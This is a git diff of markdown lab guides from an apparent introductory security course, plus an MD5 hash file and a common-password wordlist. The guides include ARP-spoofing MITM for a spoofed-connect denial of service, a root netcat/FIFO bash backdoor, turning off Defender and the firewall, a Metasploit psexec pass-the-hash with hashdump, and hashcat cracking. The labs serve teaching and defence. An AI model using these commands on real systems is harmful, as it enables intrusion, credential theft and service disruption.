-                  inet addr:192.168.1.109  Bcast:192.168.1.255  Mask:255.255.255.0
-                  inet6 addr: fe80::a00:27ff:fe65:3c64/64 Scope:Link
-                  UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
-                  RX packets:46622 errors:0 dropped:0 overruns:0 frame:0
-                  TX packets:8298 errors:0 dropped:0 overruns:0 carrier:0
-                  collisions:0 txqueuelen:1000
-                  RX bytes:14057203 (14.0 MB)  TX bytes:2659309 (2.6 MB)
-
-        lo        Link encap:Local Loopback
-                  inet addr:127.0.0.1  Mask:255.0.0.0
-                  inet6 addr: ::1/128 Scope:Host
-                  UP LOOPBACK RUNNING  MTU:16436  Metric:1
-                  RX packets:94405 errors:0 dropped:0 overruns:0 frame:0
-                   TX packets:94405 errors:0 dropped:0 overruns:0 carrier:0
-                     collisions:0 txqueuelen:0
-                  RX bytes:37127292 (37.1 MB)  TX bytes:37127292 (37.1 MB)
-We can see from the ifconfig output that my ADHD instance has an IP of 192.168.1.109
-
-I will connect to that IP on port 3389 from a box on the same network segment in order to test
-the functionality of Honeyports.
-
-I will be using RDP to make the connection.
-
-To open Remote Desktop hit `Windows Key + R` and input `mstsc.exe` before hitting OK.
-
-![](HoneyPorts_files/Image_001.png)
-
-Next simply tell RDP to connect to your machine's IP address.
-
-![](HoneyPorts_files/Image_002.png)
-
-We get an almost immediate error, this is a great sign that Honeyports is doing its job.
-
-![](HoneyPorts_files/Image_003.png)
-
-Any subsequent connection attempts are met with failure.
-
-![](HoneyPorts_files/Image_004.png)
-
-And we can confirm back inside our ADHD instance that the IP was blocked.
-
-`~$` **`sudo iptables -L`**
-
-        Chain INPUT (policy ACCEPT)
-        target     prot opt source               destination
-        REJECT     all  --  192.168.1.149        anywhere             reject-with icmp-port-unreachable
-
-        Chain FORWARD (policy ACCEPT)
-        target     prot opt source               destination
-
-        Chain OUTPUT (policy ACCEPT)
-        target     prot opt source               destination
-
-        Chain ARTILLERY (0 references)
-        target     prot opt source               destination
-
-You can clearly see the REJECT policy for 192.168.1.149 (The address I was connecting from).
-
-To remove this rule we can either:
-
-`~$` **`sudo iptables -D INPUT -s 192.168.1.149 -j REJECT`**
-
-Or Flush all the rules:
-
-`~$` **`sudo iptables -F`**
-
-Example 3: Spoofing TCP Connect for Denial Of Service
------------------------------------------------------
-
-Honeyports are designed to only properly respond to and block full TCP connects.  This is done to
-make it difficult for an attacker to spoof being someone else and trick the Honeyport into blocking
-the spoofed address.  TCP connections are difficult to spoof if the communicating hosts properly
-implement secure (hard to guess) sequence numbers.  Of course, if the attacker can "become" the
-host they wish to spoof, there isn't much you can do to stop them.
-
-This example will demonstrate how to spoof a TCP connect as someone else, for the purposes of
-helping you learn to recognize the limitations of Honeyports.
-
-If you can convince the host running Honeyports that you are the target machine, you can send
-packets as the target.  We will accomplish this through a MITM attack using ARP Spoofing.
-
-Let's assume we have two different machines, they may be either physical or virtual.
-One must be your ADHD machine running Honeyports, the other for this example will be a Kali box.
-They must both be on the same subnet.
-
-Note: Newer Linux operating systems like ADHD often have builtin protection against this attack.
-This protection mechanism is found in **/proc/sys/net/ipv4/conf/all/arp_accept**. A **1** in this
-file means that ADHD is configured to accept unsolicited ARP responses.  You can set this value by running the following command as root **`echo 1 > /proc/sys/net/ipv4/conf/all/arp_accept`**
-
-If our ADHD machine (running the Honeyports) is at 192.168.1.144 and we want to spoof 192.168.1.1
-
-Let's start by performing our MITM attack.
-
-`~#` **`arpspoof -i eth0 -t 192.168.1.144 192.168.1.1 2>/dev/null &`**
-
-`~#` **`arpspoof -i eth0 -t 192.168.1.1 192.168.1.144 2>/dev/null &`**
-
-If you want to confirm that the MITM attack is working first find the MAC address of the Kali box.
-
-`~#` **`ifconfig -a | head -n 1 | awk '{print $5}'`**
-
-        00:0c:29:40:1c:d3
-
-Then on the ADHD machine run this command to determine the current mapping of IPs to MACs.
-
-`~#` **`arp -a`**
-
-Look to see if the IP you are attempting to spoof is mapped to the MAC address from the previous step.
-
-Once we have properly performed our arpspoof we will move on to assigning a temporary IP to the
-Kali machine.
-
-This will convince the Kali machine to send packets as the spoofed host.
-
-`~#` **`ifconfig eth0:0 192.168.1.1 netmask 255.255.255.0 up`**
-
-The last step is to connect from the Kali box to the ADHD machine on a Honeyport, as 192.168.1.1
-
-For this example, lets say that port 3389 is a Honeyport as we used before in [Example 1: Monitoring A Port With HoneyPorts].
-
-`~#` **`nc 192.168.1.144 3389 -s 192.168.1.1`**
-
-It's that easy, if you list the firewall rules of the ADHD machine you should find a rule rejecting
-connections from 192.168.1.1
-
-Mitigation of this vulnerability can be accomplished with either MITM protections, or careful
-monitoring of the created firewall rules.
-
-
diff --git a/IntroClassFiles/Tools/IntroClass/LinuxCLI/LinuxCLI.md b/IntroClassFiles/Tools/IntroClass/LinuxCLI/LinuxCLI.md
index d1790043..aff0acca 100644
--- a/IntroClassFiles/Tools/IntroClass/LinuxCLI/LinuxCLI.md
+++ b/IntroClassFiles/Tools/IntroClass/LinuxCLI/LinuxCLI.md
@@ -3,11 +3,13 @@
 
 # Linux CLI
 
+# For The Ubuntu VM
+
 In this lab we will be looking at a backdoor through the lens of the the Linux CLI.
 
 We will be using a large number of different basic commands to get a better understanding of what the backdoor is and what it does.
 
-For this lab we will be running **three** different Kali terminals.
+For this lab we will be running **three** different Linux terminals.
 
  > Terminal 1 is where the backdoor will be run.
 
@@ -17,49 +19,43 @@ For this lab we will be running **three** different Kali terminals.
 
 ***
 
-Let's get started by opening a terminal as **Administrator**
-
-You can do this by right clicking the icon on the desktop and selecting open...
-
-![](attachments/OpeningKaliInstance.png)
-
-<b>Or...</b> you can simply click on the Kali logo in the taskbar.
-
-![](attachments/TaskbarKaliIcon.png)
-
-Once your **Kali** terminal opens, please run the following command:
+- Open **Terminal 1**
 
-<pre>sudo su -</pre>
+```bash
+sudo su -
+```
 
-This will get us to a root prompt. We want to do this in order to have a backdoor running as root and a connection from a different user account on the system.
+This will get us to a **root prompt**. We want to do this in order to have a **backdoor** running as **root** and a connection from a **different user account** on the system.
 
 Next, we will need to create a **FIFO** backpipe:
 
-<pre>mknod backpipe p</pre>
+```bash
+mkfifo backpipe
+```
 
 Next, let's start the backdoor:
 
-<pre>/bin/bash backpipe 0&lt;backpipe | nc -l 2222 1>backpipe</pre>
+```bash
+/bin/bash 0<backpipe | nc -l 2222 1>backpipe
+```
 
 In the above command, we are creating a **Netcat listener** that forwards all input through a backpipe and then into a bash session.  It then takes the output of the bash session and puts it back into the **Netcat listener**. 
 
 On a more basic level, this will create a backdoor listening on port 2222 of our **Linux** system.
 
-Now, let's open another **Kali** terminal.  This terminal will connect to the backdoor we just created.  
+Now, let's open another **Linux** terminal.  This terminal will connect to the backdoor we just created.  
 
-You can do this by right clicking the icon on the desktop and selecting open...
+- Open **Terminal 2**
 
-![](attachments/OpeningKaliInstance.png)
-
-<b>Or...</b> you can simply click on the Kali logo in the taskbar.
+Now we will need to know the IP address of our **Linux** system:
 
-![](attachments/TaskbarKaliIcon.png)
+```bash
+ifconfig
+```
 
-Now we will need to know the IP address of our **Linux** system:
+<img width="780" height="193" alt="Get_IPLinux" src="https://github.com/user-attachments/assets/212a2c89-6027-426a-bfde-0e459f995991" />
 
-<pre>ifconfig</pre>
 
-![](attachments/ifconfigKaliInstance.png)
 
 >[!NOTE]
 >
@@ -67,7 +63,9 @@ Now we will need to know the IP address of our **Linux** system:
 
 Now, let's connect:
 
-<pre>nc 10.10.104.64 2222</pre>
+```bash
+nc 172.31.90.102 2222
+```
 
 >[!NOTE]
 >
@@ -78,46 +76,50 @@ It can be confusing to tell whether or not you are connected to the backdoor.
 
 Type a few commands to see if its working:
 
-<pre>ls</pre>
+```bash
+ls
+```
 
-<pre>whoami</pre>
+```bash
+whoami
+```
 
-![](attachments/lswhoamiKaliInstance.png)
+<img width="497" height="135" alt="2026-03-14_14-52" src="https://github.com/user-attachments/assets/12fe76e1-088c-4391-a31d-8e05256ff569" />
 
-At this point, we have created a backdoor with one terminal, and we have connected to this backdoor with another terminal.  Now, let's open yet another **Kali** terminal and use this use for the purpose of analysis.  
 
-Let's begin by using one of the two methods used earlier to open a new **Kali** Terminal.  
+At this point, we have created a backdoor with one terminal, and we have connected to this backdoor with another terminal.  Now, let's open yet another **Linux** terminal and use this use for the purpose of analysis.  
 
-You can do this by right clicking the icon on the desktop and selecting open...
 
-![](attachments/OpeningKaliInstance.png)
 
-<b>Or...</b> you can simply click on the Kali logo in the taskbar.
 
-![](attachments/TaskbarKaliIcon.png)
+- Open **Terminal 3**
 
-On your Linux terminal, please run the following command:
-
-<pre>sudo su -</pre>
+```bash
+sudo su -
+```
 
 This will get us to a root prompt.  When we say root prompt we mean a terminal with the highest level of permission possible.  We want to be in a root prompt because looking at network connections and process information system wide requires root privileges (or the highest level of privileges).  
 
 Let's start by looking at the network connections with **lsof**.  When we use **lsof**, we are looking at open files.  When we use the **-i** flag we are looking at the open Internet connections.  When we use the **-P** flag we are telling **lsof** to not try and guess what the service is on the ports that are being used. Just give us the port number.
 
-<pre>lsof -i -P</pre>
+```bash
+lsof -i -P
+```
 
+<img width="1264" height="553" alt="1" src="https://github.com/user-attachments/assets/3b60e298-d0d3-4ac0-91cf-2bf5c1180655" />
 
-![](attachments/lsof-i-pKaliInstance.png)
 
 Now let's dig into the **netcat process ID**.  We can do this with the lowercase **-p** switch.  This will give us all the open files associated with the listed process ID.
 
-<pre>lsof -p [PID]</pre>
+```bash
+lsof -p [PID]
+```
 
 >[!NOTE]
 >
 >**Your PID will be different!!!**
 
-![](attachments/lsof-pKaliInstance.png)
+<img width="1177" height="515" alt="2" src="https://github.com/user-attachments/assets/ddb23944-81ac-451f-9a56-584acf830179" />
 
 Let's look at the full processes.  We can do this with the **ps** command. We are also adding the **a**, **u**, and **x switches**.  
 
@@ -127,37 +129,46 @@ Let's look at the full processes.  We can do this with the **ps** command. We ar
 
 Type out this command.
 
-<pre>ps aux</pre>
+```bash
+ps aux
+```
+
+<img width="1061" height="377" alt="2026-03-14_14-57" src="https://github.com/user-attachments/assets/4a8691de-eeba-4c23-9fd6-b10b6312056e" />
 
-![](attachments/psauxKaliInstance.png)
 
 Let's change directories into the **proc** directory for that **pid**.  Remember, **proc** is a directory that does not exist on the drive.  It allows us to see data associated with the various processes directly.   This can be very useful as it allows us to dig into the memory of a process that is currently running on a suspect system.
 
-<pre>cd /proc/[pid]</pre>
+```bash
+cd /proc/[pid]
+```
 
 >[!NOTE]
 >
 >**Your PID will be different!!!**
 
-![](attachments/procPIDKaliInstance.png)
-
 We can see a number of interesting directories here:
 
-<pre>ls</pre>
+```bash
+ls
+```
 
-![](attachments/lsKaliInstance.png)
+<img width="1416" height="180" alt="2026-03-14_15-05" src="https://github.com/user-attachments/assets/9b6cf660-6977-42b3-a9f7-abb6cf6589ac" />
 
 We can run the **strings** command on the executable in this directory.  When programs are created there may be usage information, mentions of system libraries, and possible code comments. We use this all the time to attempt to identify what exactly a program is doing.
 
-<pre>strings ./exe | less</pre>
+```bash
+strings ./exe | less
+```
 
-![](attachments/strings_exelessKaliInstance.png)
+<img width="289" height="334" alt="1" src="https://github.com/user-attachments/assets/f495288b-e184-42aa-85fd-cc4736c35471" />
 
 If we scroll down, we can see the actual usage information for netcat.  We pulled it directly out of memory!
 
 To reveal more information in the output, press **"enter"**.
 
-![](attachments/netcatusageKaliInstance.png)
+<img width="894" height="725" alt="2" src="https://github.com/user-attachments/assets/258402b5-c5a4-4b1d-a172-0643ae0f1ad4" />
+
+- Press **q** to go back
 
 ***                                                                 
 
@@ -174,3 +185,12 @@ Please be sure to destroy the lab environment!
 ---
 
 
+
+
+
+
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/Nmap/Nmap.md b/IntroClassFiles/Tools/IntroClass/Nmap/Nmap.md
index 19f3be25..e47de7a3 100755
--- a/IntroClassFiles/Tools/IntroClass/Nmap/Nmap.md
+++ b/IntroClassFiles/Tools/IntroClass/Nmap/Nmap.md
@@ -11,57 +11,55 @@ Remember, treat your internal network as hostile, because it is.
 
 Let's get started by opening a command prompt terminal. You can do this by clicking the icon in the taskbar.
 
-![](attachments/openingcommandprompt%20-%20Copy.png)
 
-From the command prompt we need to get the IP address of **your** Windows system:
-
-<pre>ipconfig</pre>
-
-![](attachments/nmap_ipconfig.png)
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/19ade57f-f3a3-4d2e-ad65-13251ee1cc35" />
 
-Please note your IP for **your** system. Mine is **"10.10.1.209"**. 
 
-**Yours will be different.**
-
-Let’s try and scan your Windows system from within a **Kali** terminal. Go ahead and open a **Kali** terminal up.
 
-![](attachments/OpeningKaliInstance.png)
+From the command prompt we need to get the IP address of **your** Windows system:
 
-Alternatively, you can click on the **Kali** logo in the taskbar.
+```cmd
+ipconfig
+```
 
-![](attachments/TaskbarKaliIcon.png)
+<img width="697" height="288" alt="2026-02-23_12-46" src="https://github.com/user-attachments/assets/83c711b6-fa49-4384-8aa5-f429f6724776" />
 
-In the **Kali** terminal, let’s become root:
+Please note your IP for **your** system. Mine is **"10.10.86.77"**. 
 
-<pre>sudo su -</pre>
+**Yours will be different.**
 
-We will scan your Windows system:
+Let’s enable the Windows firewall:
 
-<pre>nmap 10.10.1.209</pre>
+```bash
+netsh advfirewall set allprofiles state on
+```
 
-You can hit the spacebar to get status.
 
-It should look like this:
+![](attachments/nmap_advfirewallon.png)
 
-![](attachments/nmap_nmap.png)
+Let’s try and scan your Windows system from within a **Linux** terminal. Go ahead and open a **Linux** terminal up.
 
-Please note the open ports. These are ports and services that an attacker could use to authenticate to your system or attack if an exploit is available. 
 
-Go back to the **Windows** command prompt.  
+- **Double-click** `Ubuntu Shell` on Desktop
 
-![](attachments/openingcommandprompt%20-%20Copy.png)
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/196f7867-877b-4a37-bc02-1214e50e96a5" />
 
-Let’s enable the Windows firewall:
+In the **Linux** terminal, let’s become root:
 
-<pre>netsh advfirewall set allprofiles state on</pre>
+```bash
+sudo su -
+```
 
-![](attachments/nmap_advfirewallon.png)
+Now, let’s rescan from the **Linux** terminal.
 
-Now, let’s rescan from the **Kali** terminal.
+Run the scan: 
 
-Rerun the scan: 
+```bash
+nmap 10.10.86.77
+```
 
-<pre>nmap 10.10.1.209</pre>
+>[!IMPORTANT]
+>Your IP will be different!!!!
 
 Please note, you can just hit the up arrow key to view previously run commands.  
 
@@ -69,14 +67,21 @@ You can hit the spacebar to see status.
 
 It should look like this:
 
-![](attachments/nmap_nmapscanwfirewall.png)
+<img width="604" height="443" alt="2026-02-23_12-50" src="https://github.com/user-attachments/assets/e3cfa5e0-5130-496f-bddc-bcf6c2853857" />
+
+Please note the open ports. These are ports and services that an attacker could use to authenticate to your system or attack if an exploit is available. 
 
 Now, using the same process as before, let’s disable the **Windows** firewall to go back to the base state:
 
-<pre>netsh advfirewall set allprofiles state off</pre>
+```cmd
+netsh advfirewall set allprofiles state off
+```
 
-![](attachments/nmap_turnbackon.png)
+<img width="620" height="463" alt="2026-02-23_13-04" src="https://github.com/user-attachments/assets/dc9909ed-8732-496b-8876-c20c19df8416" />
 
+- As we can see, there is one more service shown open on port **5357** and also, the other **985** ports are shown as directly as **closed**, not **filtered**
+
+---
 
 Now, lets see why this is important with pass the hash.
 
@@ -84,49 +89,78 @@ First lets configure the Windows system
 
 Let's disable AV.
 
-PS C:\Users\Administrator> `Set-MpPreference -DisableRealtimeMonitoring $true`
+- Open **Powershell**
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-15" src="https://github.com/user-attachments/assets/4bb73f73-82e2-419d-8f70-4f57c21cb3bf" />
+
+```ps
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
 
 Next, let's make sure that firewall is off.
 
-PS C:\Users\Administrator> `netsh advfirewall set allprofiles state off`
+```ps
+netsh advfirewall set allprofiles state off
+```
 
 Now, let's set an easy password.  
 
-PS C:\Users\Administrator> `net user Administrator password1234`
-
-PS C:\Users\Administrator> `ipconfig`
+```ps
+net user Administrator password1234
+```
 
 
 It should look like this:
 
-<img width="641" alt="image" src="https://github.com/user-attachments/assets/10ffe094-f254-451e-95eb-d830b044e9a6">
+<img width="718" height="130" alt="2026-02-23_13-31" src="https://github.com/user-attachments/assets/0e82b469-9b03-43f6-a16d-9fab7c1ac38d" />
+
+- Now get you **Windows IP**:
+
+```ps
+ipconfig
+```
+
+<img width="639" height="154" alt="Get_IpWIN" src="https://github.com/user-attachments/assets/ad0b348b-cc4f-40e3-9625-c9bbc42e3e0a" />
+
+
+Now, let's open a Linux terminal:
+
+- **Double-click** `Ubuntu Shell` on Desktop
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/196f7867-877b-4a37-bc02-1214e50e96a5" />
 
-Now, let's open a Kali terminal:
 
-<img width="42" alt="image" src="https://github.com/user-attachments/assets/c64ee4a9-a642-4128-bb84-9cbe016cc5ba">
 
 Become root:
 
-`sudo su -`
+```bash
+sudo su -
+```
 
 Start Metasploit
 
-`msfconsole -q`
+```bash
+msfconsole -q
+```
 
-<img width="770" alt="image" src="https://github.com/user-attachments/assets/d32ecb85-5873-478a-b270-fbaf33e11aec">
+<img width="577" height="91" alt="msfconsolebash" src="https://github.com/user-attachments/assets/7078dce4-0385-40fe-a7a5-6852d28a30bf" />
 
-In another Kali terminal, get your IP address
 
-`ifconfig`
+In another Linux terminal, get your IP address
+
+```bash
+ifconfig
+```
+
+<img width="716" height="175" alt="Get_IP" src="https://github.com/user-attachments/assets/cc1893c9-3a96-4ddb-a16a-45f0bdad0e10" />
 
-<img width="661" alt="image" src="https://github.com/user-attachments/assets/44e622e5-34b6-4f0e-8547-769e891152e5">
 
 msf6 > `use exploit/windows/smb/psexec`
 
 
-msf6 exploit(windows/smb/psexec) > `set RHOST 10.10.70.106`
+msf6 exploit(windows/smb/psexec) > `set RHOST <Windows IP>`
 
-msf6 exploit(windows/smb/psexec) > `set LHOST 10.10.117.128`
+msf6 exploit(windows/smb/psexec) > `set LHOST <Linux IP>`
 
 
 msf6 exploit(windows/smb/psexec) > `set SMBUSER Administrator`
@@ -137,25 +171,23 @@ msf6 exploit(windows/smb/psexec) > `exploit`
 
 It should look lie this:
 
-<img width="1139" alt="image" src="https://github.com/user-attachments/assets/9eb2b530-b318-4636-a111-5d6cbe73a906">
+<img width="947" height="377" alt="2026-02-23_13-46" src="https://github.com/user-attachments/assets/63165ac9-d530-48f4-bc56-665c17ace0d1" />
+
 
 Now dump the password hashes:
 
 meterpreter > `hashdump`
 
-<img width="1139" alt="image" src="https://github.com/user-attachments/assets/b3bbe145-51ab-4029-aefe-e036351af4fa">
+<img width="805" height="122" alt="1" src="https://github.com/user-attachments/assets/85a53c8e-5339-40fd-8a3c-316fec8b26bd" />
 
-meterpreter > exit -y
-
-
-msf6 exploit(windows/smb/psexec) > `set SMBPASS aad3b435b51404eeaad3b435b51404ee:30ee6993157208a29fb730af8bcc3dfe`
+meterpreter > `exit -y`
 
 
-<img width="1143" alt="image" src="https://github.com/user-attachments/assets/14882bb7-6891-4898-8dea-bc8023fd5930">
+msf6 exploit(windows/smb/psexec) > `set SMBPASS aad3b435b51404eeaad3b435b51404ee:d4a1be1776ad10df103812b1a923cde4`
 
 msf6 exploit(windows/smb/psexec) > `exploit`
 
-<img width="1096" alt="image" src="https://github.com/user-attachments/assets/a0025016-882b-409c-90e1-ade208a19f7e">
+<img width="1030" height="445" alt="2" src="https://github.com/user-attachments/assets/f3801a66-0c9e-4087-b219-180ac2fd8564" />
 
 Kill it
 
@@ -163,23 +195,20 @@ Kill it
 meterpreter > `exit -y`
 
 
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/PasswordCracking/PasswordCracking.md)</i></b>
 
-Now, back at the Windows Powershell, re-enable your firewall
-
-
-PS C:\Users\Administrator> `netsh advfirewall set allprofiles state on`
-
-Then re-run the attack!!
-
-<img width="1142" alt="image" src="https://github.com/user-attachments/assets/0cf9fa38-e3e3-419c-a346-576c90f6074c">
-
-
-
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/nessusIntroClass/Nessus.md)</i></b>
 
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
 
+***Finished with the Labs?***
 
+Please be sure to destroy the lab environment!
 
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
 
+---
 
 
 
@@ -190,19 +219,11 @@ Then re-run the attack!!
 
 
 
-***
-***Continuing on to the next Lab?***
 
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
 
-***Finished with the Labs?***
 
 
-Please be sure to destroy the lab environment!
 
-[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
 
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
 
----
 
diff --git a/IntroClassFiles/Tools/IntroClass/PasswordCracking/MD5.txt b/IntroClassFiles/Tools/IntroClass/PasswordCracking/MD5.txt
new file mode 100644
index 00000000..ed572729
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/PasswordCracking/MD5.txt
@@ -0,0 +1,6 @@
+6e932d615f16a74d3cfe0c42f30a541d
+5ae53028efd00ce255c961ccc5535024
+15b29ffdce66e10527a65bc6d71ad94d
+0467d913571cb8f23b2b99f7c5cd4d5f
+45fb45cd49d4fffa0c72db7e59450d4f
+1461b2d7619c7b7658e012d68b827dda
diff --git a/IntroClassFiles/Tools/IntroClass/PasswordCracking/PasswordCracking.md b/IntroClassFiles/Tools/IntroClass/PasswordCracking/PasswordCracking.md
index 62d93549..c24c0f03 100755
--- a/IntroClassFiles/Tools/IntroClass/PasswordCracking/PasswordCracking.md
+++ b/IntroClassFiles/Tools/IntroClass/PasswordCracking/PasswordCracking.md
@@ -3,79 +3,69 @@
 
 # Password Cracking
 
-In this lab we will be getting started with the fundamentals of password cracking.  We will be using **Hashcat** to do this.
-
-To start, disable **Defender** and open **PowerShell** to run the following command:
-
-![](attachments/OpeningPowershell.png)
-
-<pre>Set-MpPreference -DisableRealtimeMonitoring $true</pre>
+# Ubuntu VM
 
-This will disable **Defender** for this session.
 
-If you get angry red errors, that is Ok, it means **Defender** is not running.
-
-We need to launch a **Kali** terminal. Click the **Kali** icon in the taskbar.
-
-![](attachments/TaskbarKaliIcon.png)
-
-When the terminal opens, we need to gain root access by running the following:
+In this lab we will be getting started with the fundamentals of password cracking.  We will be using **Hashcat** to do this.
 
-<pre>sudo su -</pre>
+After you open a terminal, we need to gain root access by running the following:
 
 Now, let's delete any old leftover pot files
 
-<pre> rm /root/.local/share/hashcat/hashcat.potfile</pre>
+```bash
+rm ~/.local/share/hashcat/hashcat.potfile  
+```
 
 If you get an error that the file does not exist, that is fine.  It just means the file does not exist.  Carry on.
 
 We need to navigate to the appropriate directory. Run the following:
 
-<pre>cd /opt/Password_Cracking</pre>
+```bash
+cd ~/Intro_To_Security/Password_Cracking
+```
 
 Lets begin by attempting to crack some **MD5 hashes**. 
 
 Run the following command:
 
-<pre>hashcat -a 0 -m 0 -r /usr/share/hashcat/rules/Incisive-leetspeak.rule MD5.txt password.lst</pre>
+```bash
+hashcat -a 0 -m 0 -r /usr/share/hashcat/rules/Incisive-leetspeak.rule MD5.txt password.lst
+```
 
 The result will look like this:
 
-![](attachments/md5run.png)
+<img width="1335" height="838" alt="2026-02-10_13-54" src="https://github.com/user-attachments/assets/65ce6739-e080-4861-93c8-2ff424d6c497" />
 
-Running this command will not show us the cracked hashes. As seen above, in order to see cracked hashes, we need to run our command again and add the **--show** option onto the end.
-
-After running the command again with the **--show** option, you should see something like this:
-
-![](attachments/md5hashes.png)
 
 Lets crack some NT hashes.  These are the hashes that almost all modern **Windows** systems store these days.  Older systems may store **LANMAN**, but that is very rare.
 
 Lets run the following command:
 
-<pre>hashcat -a 0 -m 1000 -r/usr/share/hashcat/rules/Incisive-leetspeak.rule sam.txt password.lst</pre>
+```bash
+hashcat -a 0 -m 1000 -r/usr/share/hashcat/rules/Incisive-leetspeak.rule sam.txt password.lst
+```
 
 When this command is complete, it should look like this:
 
-![](attachments/nthashrun.png)
+<img width="1333" height="821" alt="image" src="https://github.com/user-attachments/assets/af468a02-3513-4705-ac6d-ceba91684ad2" />
 
-We will not see the cracked hashes unless we append **--show** onto the end of the command. Lets do that.  Run it again to see the cracked hashes:
 
-![](attachments/ntcracked.png)
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/PasswordSpray/PasswordSpray.md)</i></b>
 
-***
-***Continuing on to the next Lab?***
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/Nmap/Nmap.md)</i></b>
 
-[Click here to get back to the Navigation Menu](/IntroClassFiles/navigation.md)
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
 
 ***Finished with the Labs?***
 
-
 Please be sure to destroy the lab environment!
 
 [Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
 
-[Return To Lab List](https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/navigation.md)
-
 ---
 
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/PasswordCracking/password.lst b/IntroClassFiles/Tools/IntroClass/PasswordCracking/password.lst
new file mode 100644
index 00000000..6a8d24b9
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/PasswordCracking/password.lst
@@ -0,0 +1,3557 @@
+#!comment: This list has been compiled by Solar Designer of Openwall Project,
+#!comment: http://www.openwall.com/wordlists/
+#!comment:
+#!comment: This list is based on passwords most commonly seen on a set of Unix
+#!comment: systems in mid-1990's, sorted for decreasing number of occurrences
+#!comment: (that is, more common passwords are listed first).  It has been
+#!comment: revised to also include common website passwords from public lists
+#!comment: of "top N passwords" from major community website compromises that
+#!comment: occurred in 2006 through 2010.
+#!comment:
+#!comment: Last update: 2011/11/20 (3546 entries)
+123456
+12345
+password
+password1
+123456789
+12345678
+1234567890
+abc123
+computer
+tigger
+1234
+qwerty
+money
+carmen
+mickey
+secret
+summer
+internet
+a1b2c3
+123
+service
+
+canada
+hello
+ranger
+shadow
+baseball
+donald
+harley
+hockey
+letmein
+maggie
+mike
+mustang
+snoopy
+buster
+dragon
+jordan
+michael
+michelle
+mindy
+patrick
+123abc
+andrew
+bear
+calvin
+changeme
+diamond
+fuckme
+fuckyou
+matthew
+miller
+tiger
+trustno1
+alex
+apple
+avalon
+brandy
+chelsea
+coffee
+falcon
+freedom
+gandalf
+green
+helpme
+linda
+magic
+merlin
+newyork
+soccer
+thomas
+wizard
+asdfgh
+bandit
+batman
+boris
+butthead
+dorothy
+eeyore
+fishing
+football
+george
+happy
+iloveyou
+jennifer
+jonathan
+love
+marina
+master
+missy
+monday
+monkey
+natasha
+ncc1701
+pamela
+pepper
+piglet
+poohbear
+pookie
+rabbit
+rachel
+rocket
+rose
+smile
+sparky
+spring
+steven
+success
+sunshine
+victoria
+whatever
+zapata
+8675309
+amanda
+andy
+angel
+august
+barney
+biteme
+boomer
+brian
+casey
+cowboy
+delta
+doctor
+fisher
+island
+john
+joshua
+karen
+marley
+orange
+please
+rascal
+richard
+sarah
+scooter
+shalom
+silver
+skippy
+stanley
+taylor
+welcome
+zephyr
+111111
+aaaaaa
+access
+albert
+alexander
+andrea
+anna
+anthony
+asdfjkl;
+ashley
+basketball
+beavis
+black
+bob
+booboo
+bradley
+brandon
+buddy
+caitlin
+camaro
+charlie
+chicken
+chris
+cindy
+cricket
+dakota
+dallas
+daniel
+david
+debbie
+dolphin
+elephant
+emily
+friend
+fucker
+ginger
+goodluck
+hammer
+heather
+iceman
+jason
+jessica
+jesus
+joseph
+jupiter
+justin
+kevin
+knight
+lacrosse
+lakers
+lizard
+madison
+mary
+mother
+muffin
+murphy
+nirvana
+paris
+pentium
+phoenix
+picture
+rainbow
+sandy
+saturn
+scott
+shannon
+shithead
+skeeter
+sophie
+special
+stephanie
+stephen
+steve
+sweetie
+teacher
+tennis
+test
+test123
+tommy
+topgun
+tristan
+wally
+william
+wilson
+1q2w3e
+654321
+666666
+a12345
+a1b2c3d4
+alpha
+amber
+angela
+angie
+archie
+asdf
+blazer
+bond007
+booger
+charles
+christin
+claire
+control
+danny
+david1
+dennis
+digital
+disney
+edward
+elvis
+felix
+flipper
+franklin
+frodo
+honda
+horses
+hunter
+indigo
+james
+jasper
+jeremy
+julian
+kelsey
+killer
+lauren
+marie
+maryjane
+matrix
+maverick
+mayday
+mercury
+mitchell
+morgan
+mountain
+niners
+nothing
+oliver
+peace
+peanut
+pearljam
+phantom
+popcorn
+princess
+psycho
+pumpkin
+purple
+randy
+rebecca
+reddog
+robert
+rocky
+roses
+salmon
+samson
+sharon
+sierra
+smokey
+startrek
+steelers
+stimpy
+sunflower
+superman
+support
+sydney
+techno
+walter
+willie
+willow
+winner
+ziggy
+zxcvbnm
+alaska
+alexis
+alice
+animal
+apples
+barbara
+benjamin
+billy
+blue
+bluebird
+bobby
+bonnie
+bubba
+camera
+chocolate
+clark
+claudia
+cocacola
+compton
+connect
+cookie
+cruise
+douglas
+dreamer
+dreams
+duckie
+eagles
+eddie
+einstein
+enter
+explorer
+faith
+family
+ferrari
+flamingo
+flower
+foxtrot
+francis
+freddy
+friday
+froggy
+giants
+gizmo
+global
+goofy
+happy1
+hendrix
+henry
+herman
+homer
+honey
+house
+houston
+iguana
+indiana
